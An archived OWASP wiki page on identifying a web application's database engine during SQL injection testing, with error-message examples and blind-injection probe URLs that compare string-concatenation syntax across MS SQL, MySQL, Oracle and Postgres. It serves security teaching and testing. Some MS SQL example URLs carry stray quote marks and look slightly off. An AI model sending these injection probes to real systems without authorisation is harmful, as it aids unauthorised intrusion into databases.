This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "OWASP Backend Security Project DBMS Fingerprint"
(→References) |
(→Tools) |
||
| Line 105: | Line 105: | ||
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt | http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt | ||
| − | + | = Tools = | |
Bernardo Damele and Daniele Bellucci: sqlmap a blind SQL injection tool | Bernardo Damele and Daniele Bellucci: sqlmap a blind SQL injection tool | ||
http://sqlmap.sourceforge.net/ | http://sqlmap.sourceforge.net/ | ||
Revision as of 13:53, 11 May 2008
Overview
To furthermore exploit SQL Injection vulnerability you need to know what kind of Database Engine your web application is using. There are a few techniques to accomplish this task:
* Error Code Analysis * Engine Fingerprint
Description
Error Codes Analysis
By performing fault injection, or fuzzing, you can gather important information through error code analysis. Let'see some examples:
http://www.example.com/store/findproduct.php?name=' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
http://www.example.com/store/products.php?id=' Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM products WHERE ID=' ^ in /var/www/store/products.php on line 9
Engine Fingerprint
First of all let see what differences exists between DBMS. One of the biggest difference between different database engine is on how they concatenate strings:
MS SQL: 'a' + 'a'
MySQL: CONCAT('a','a')
Oracle: 'a' || 'a' or CONCAT('a','a')
Postgres: 'a' || 'a'
As you can see both Oracle and Postgres use the || operator to perform
such a concatenation, so we need another difference to distinguish them.
PL/SQL define the CONCAT operator as well to perform string concatenation and as you can guess this one is not defined on Postgres.
Example:
Let say you're testing the following URL: http://www.example.com/news.php?id=1
You checked that the above URL is vulnerable to a Blind SQL Injection. It means that http://www.example.com/news.php return back the same contents with both
id=1 (http://www.example.com/news.php?id=1)
and
id=1 AND 1=1 (http://www.example.com/news.php?id=1 AND 1=1)
You know that different engine have different operators to perform string concatenation as well so all you have to do is to compare the orginal page (id=1) with:
- MSSQL: id=1 AND 'aa'='a'+'a'
- MySQL/Oracle: id=1 AND 'aa'=CONCAT('a','a')
- Oracle/Postgres: id=1 AND 'a'='a'||'a'
MS SQL:
The following comparison should be true:
- http://www.example.com/news.php?id=1''
- http://www.example.com/news.php?id=1 AND 'aa'='a'+'a'''
MySQL:
The following comparison should be true:
- http://www.example.com/news.php?id=1
- http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')
Oracle:
The following comparison should be true:
- http://www.example.com/news.php?id=1
- http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')
- http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'
Postgres:
The following comparison should be true:
- http://www.example.com/news.php?id=1
- http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'
References
Victor Chapela: "Advanced SQL Injection"
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
Tools
Bernardo Damele and Daniele Bellucci: sqlmap a blind SQL injection tool
